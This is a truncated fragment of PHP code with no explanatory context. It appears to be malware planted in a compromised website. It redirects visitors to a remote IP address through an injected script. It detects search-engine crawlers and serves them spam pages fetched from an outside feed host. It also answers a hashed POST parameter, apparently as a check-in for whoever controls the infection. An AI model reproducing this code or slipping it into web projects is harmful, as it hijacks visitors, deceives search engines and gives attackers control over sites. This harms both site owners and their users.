	die("<!DOCTYPE html><html><body><script>document.location=(\"http://178.73.212.30/stat/go.php?k=$k&s=$s&r=$r\");</script></body></html>");
	}
	}

	$tdir = frm_tmpdir();
	$isb=frm_isbot();
	$k=frm_havekey();
	$host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));
	if($cv=@$_POST[md5($host.'ch')]){exit($cv);}
	if($tdir && strlen($host)<100 && !preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/', $host)){
	$parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host.'p1')))),0,3);
	$sp = "http://uwvbfiyuw.byinter.net/stat/feed.php?pa=$parg&h=$host";
	//
	$tp=$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
	if($isb && ($ppr = frm_chpr($tp)) > 1){
	$pc=frm_getcache($tdir, $sp."&a=l&p=".urlencode($tp)."&pr=$ppr",60*24);
	if($pc) die($pc);
	}
	//
	$ruri = strtolower($_SERVER['REQUEST_URI']);
	$pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;
	if((strpos($ruri,'/?')===0\|\|strpos($ruri,'/index.php?')===0) && $pageid > 0){
	frm_red($k);
	die(frm_getcache($tdir, $sp."&p=$pageid",60*24,true));
	}
	if (($ruri=='/' \|\| $ruri=='/index.php') && $isb) {
	$c=frm_getcache($tdir, $sp ,60*24);
	if($c)die($c);
	}
	//
	if($k && $sdl = frm_getcache($tdir, $sp."&a=s", ($isb ? 30 : 60247) ,true)){
	if(strpos($sdl, '\|'.$ruri.'\|') !== false){
	frm_red($k);
	die(frm_getcache($tdir, $sp."&a=s&p=".urlencode($ruri),60247,true));
	}
	}
	}
	if($k) frm_red($k);
	}
	?>